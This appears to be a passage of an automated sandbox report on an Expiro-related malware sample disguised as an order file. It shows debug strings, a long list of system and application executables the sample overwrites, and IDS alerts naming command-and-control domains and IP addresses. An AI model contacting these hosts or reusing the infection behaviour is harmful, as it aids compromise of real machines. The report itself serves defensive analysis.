Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdb source: alg.exe, 0000000B.00000003.2009762179.0000000000B90000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2009857048.0000000000400000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 00000012.00000003.2573298301.0000000000730000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 00000012.00000003.2573255343.00000000007C0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\ktab_objs\ktab.pdb source: alg.exe, 0000000B.00000003.2036151480.0000000000400000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\jjs_objs\jjs.pdb source: alg.exe, 0000000B.00000003.2034574236.0000000000400000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\dbs\el\ja2\Target\x86\ship\dcf\x-none\SpreadsheetCompare.pdb source: alg.exe, 0000000B.00000003.2062072594.0000000000B90000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: PresentationFontCache.pdb source: alg.exe, 0000000B.00000003.1991666348.00000000016C0000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 00000012.00000003.2527182119.0000000000DB0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: mavinject32.pdbGCTL source: alg.exe, 0000000B.00000003.2011798103.0000000000B90000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 00000012.00000003.2576506040.0000000001460000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\pack200_objs\pack200.pdb source: alg.exe, 0000000B.00000003.2036762332.0000000000400000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: _.pdb source: vbc.exe, 0000002A.00000002.2656794908.0000000007376000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 0000002A.00000002.2688454630.0000000008741000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000002A.00000002.2669298938.0000000007590000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: D:\dbs\el\ja2\Target\x86\ship\dcf\x-none\Common.DBConnection.pdb source: alg.exe, 0000000B.00000003.2060589054.0000000000B90000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\rmiregistry_objs\rmiregistry.pdb source: alg.exe, 0000000B.00000003.2037617501.0000000000400000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdb source: SingleClientServicesUpdater.exe.9.dr
Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdb source: alg.exe, 0000000B.00000003.2010753406.0000000000B90000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 00000012.00000003.2574637480.00000000007C0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb source: alg.exe, 0000000B.00000003.2002253535.0000000000400000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 00000012.00000003.2563833897.0000000000730000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\tnameserv_objs\tnameserv.pdb source: alg.exe, 0000000B.00000003.2038419292.0000000000400000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\servertool_objs\servertool.pdb source: alg.exe, 0000000B.00000003.2037851037.0000000000400000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: MicrosoftEdgeUpdate_unsigned.pdb source: alg.exe, 0000000B.00000003.2050845345.0000000000B90000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: d:\dbs\el\omr\target\x86\ship\dcf\x-none\Common.ShowHelp.pdb00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S source: Common.ShowHelp.exe.9.dr
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\rmid_objs\rmid.pdb source: alg.exe, 0000000B.00000003.2037331399.0000000000400000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\java-rmi_objs\java-rmi.pdb source: alg.exe, 0000000B.00000003.2033387100.0000000000400000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdbU source: alg.exe, 0000000B.00000003.2009762179.0000000000B90000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2009857048.0000000000400000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 00000012.00000003.2573298301.0000000000730000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 00000012.00000003.2573255343.00000000007C0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdbT source: SingleClientServicesUpdater.exe.9.dr
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\keytool_objs\keytool.pdb source: alg.exe, 0000000B.00000003.2035106637.0000000000400000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\jjs_objs\jjs.pdb source: alg.exe, 0000000B.00000003.2034574236.0000000000400000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: mavinject32.pdb source: alg.exe, 0000000B.00000003.2011798103.0000000000B90000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 00000012.00000003.2576506040.0000000001460000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\policytool_objs\policytool.pdb source: alg.exe, 0000000B.00000003.2037004985.0000000000400000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: AppVDllSurrogate32.pdb source: alg.exe, 0000000B.00000003.2053440475.0000000000B90000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdbY source: alg.exe, 0000000B.00000003.2010753406.0000000000B90000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 00000012.00000003.2574637480.00000000007C0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: d:\dbs\el\omr\target\x86\ship\dcf\x-none\Common.ShowHelp.pdb source: Common.ShowHelp.exe.9.dr
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\rmid_objs\rmid.pdb source: alg.exe, 0000000B.00000003.2037331399.0000000000400000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: GoogleUpdate_unsigned.pdb source: alg.exe, 0000000B.00000003.2031098154.0000000000B90000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\servertool_objs\servertool.pdb source: alg.exe, 0000000B.00000003.2037851037.0000000000400000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\policytool_objs\policytool.pdb source: alg.exe, 0000000B.00000003.2037004985.0000000000400000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\keytool_objs\keytool.pdb source: alg.exe, 0000000B.00000003.2035106637.0000000000400000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: AppVlp.pdb source: alg.exe, 0000000B.00000003.2053936657.0000000000B90000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\dbs\el\ja2\Target\x86\ship\dcf\x-none\Common.DBConnection.pdbn#n source: alg.exe, 0000000B.00000003.2060589054.0000000000B90000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\klist_objs\klist.pdb source: alg.exe, 0000000B.00000003.2035936901.0000000000400000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\tnameserv_objs\tnameserv.pdb source: alg.exe, 0000000B.00000003.2038419292.0000000000400000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\ktab_objs\ktab.pdb source: alg.exe, 0000000B.00000003.2036151480.0000000000400000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: AppVDllSurrogate32.pdbGCTL source: alg.exe, 0000000B.00000003.2053440475.0000000000B90000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\java-rmi_objs\java-rmi.pdb source: alg.exe, 0000000B.00000003.2033387100.0000000000400000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb$$ source: alg.exe, 0000000B.00000003.2002253535.0000000000400000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 00000012.00000003.2563833897.0000000000730000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\kinit_objs\kinit.pdb source: alg.exe, 0000000B.00000003.2035579850.0000000000400000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\orbd_objs\orbd.pdb source: alg.exe, 0000000B.00000003.2036511619.0000000000400000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\rmiregistry_objs\rmiregistry.pdb source: alg.exe, 0000000B.00000003.2037617501.0000000000400000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\pack200_objs\pack200.pdb source: alg.exe, 0000000B.00000003.2036762332.0000000000400000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: PresentationFontCache.pdbHt^t Pt_CorExeMainmscoree.dll source: alg.exe, 0000000B.00000003.1991666348.00000000016C0000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 00000012.00000003.2527182119.0000000000DB0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\dbs\el\ja2\Target\x86\ship\dcf\x-none\DatabaseCompare.pdb source: alg.exe, 0000000B.00000003.2061513893.0000000000B90000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\kinit_objs\kinit.pdb source: alg.exe, 0000000B.00000003.2035579850.0000000000400000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\klist_objs\klist.pdb source: alg.exe, 0000000B.00000003.2035936901.0000000000400000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\orbd_objs\orbd.pdb source: alg.exe, 0000000B.00000003.2036511619.0000000000400000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: AppVlp.pdbGCTL source: alg.exe, 0000000B.00000003.2053936657.0000000000B90000.00000004.00001000.00020000.00000000.sdmp

                  Spreading

                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe System file written: C:\Windows\System32\wbem\WmiApSrv.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe System file written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe System file written: C:\Program Files\Mozilla Firefox\pingsender.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe System file written: C:\Windows\System32\vds.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe System file written: C:\Windows\System32\alg.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe System file written: C:\Program Files\7-Zip\7zFM.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe System file written: C:\Windows\System32\snmptrap.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe System file written: C:\Windows\System32\Spectrum.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe System file written: C:\Program Files\Windows Media Player\wmpnetwk.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe System file written: C:\Windows\System32\Locator.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe System file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe System file written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe System file written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe System file written: C:\Program Files\7-Zip\7z.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.134\Installer\chrmstp.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe System file written: C:\Windows\System32\AppVClient.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.134\notification_helper.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe System file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe System file written: C:\Program Files\Mozilla Firefox\crashreporter.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe System file written: C:\Windows\SysWOW64\perfhost.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe System file written: C:\Program Files\7-Zip\7zG.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe System file written: C:\Windows\System32\msiexec.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe System file written: C:\Windows\System32\VSSVC.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe System file written: C:\Windows\System32\wbengine.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.134\Installer\setup.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe System file written: C:\Windows\System32\SearchIndexer.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe System file written: C:\Program Files\Mozilla Firefox\private_browsing.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe System file written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe System file written: C:\Windows\System32\TieringEngineService.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe System file written: C:\Program Files\Mozilla Firefox\firefox.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe System file written: C:\Program Files (x86)\AutoIt3\Au3Info.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe System file written: C:\Program Files\Mozilla Firefox\updater.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe System file written: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe System file written: C:\Program Files (x86)\AutoIt3\Au3Check.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe System file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.134\chrome_pwa_launcher.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe System file written: C:\Windows\System32\AgentService.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe System file written: C:\Program Files\7-Zip\Uninstall.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe System file written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe System file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe System file written: C:\Windows\System32\FXSSVC.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe System file written: C:\Windows\System32\OpenSSH\ssh-agent.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.134\elevation_service.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe System file written: C:\Windows\System32\sppsvc.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe System file written: C:\Windows\System32\SensorDataService.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe System file written: C:\Windows\System32\msdtc.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe System file written: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe System file written: C:\Program Files\Mozilla Firefox\plugin-container.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 9_2_00F4DF57 FindFirstFileW, 9_2_00F4DF57
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\java.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaw.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaws.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\java.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaw.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaws.exe
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe Code function: 4x nop then jmp 0F260B84h 0_2_0F260283
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h 9_2_070BE2D8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4x nop then mov esp, ebp 9_2_09F13C60
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4x nop then jmp 09F10248h 9_2_09F10040
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4x nop then jmp 09F10D3Ch 9_2_09F10040
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exe Code function: 4x nop then jmp 08E3F64Dh 22_2_08E3ED52
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h 42_2_074BE2D8

                  Networking

                  Source: Network traffic Suricata IDS: 2051648 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) : 192.168.2.7:53251 -> 1.1.1.1:53
                  Source: Network traffic Suricata IDS: 2051649 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) : 192.168.2.7:54852 -> 1.1.1.1:53
                  Source: Network traffic Suricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.7:49780 -> 172.234.222.138:80
                  Source: Network traffic Suricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.7:49903 -> 82.112.184.197:80
                  Source: global traffic HTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
                  Source: global traffic HTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
                  Source: unknown DNS query: name: checkip.dyndns.org
                  Source: unknown DNS query: name: reallyfreegeoip.org
                  Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49718 -> 132.226.247.73:80
                  Source: Network traffic Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.141.10.107:80 -> 192.168.2.7:49740
                  Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49754 -> 132.226.247.73:80
                  Source: Network traffic Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.141.10.107:80 -> 192.168.2.7:49740
                  Source: Network traffic Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 47.129.31.212:80 -> 192.168.2.7:49922
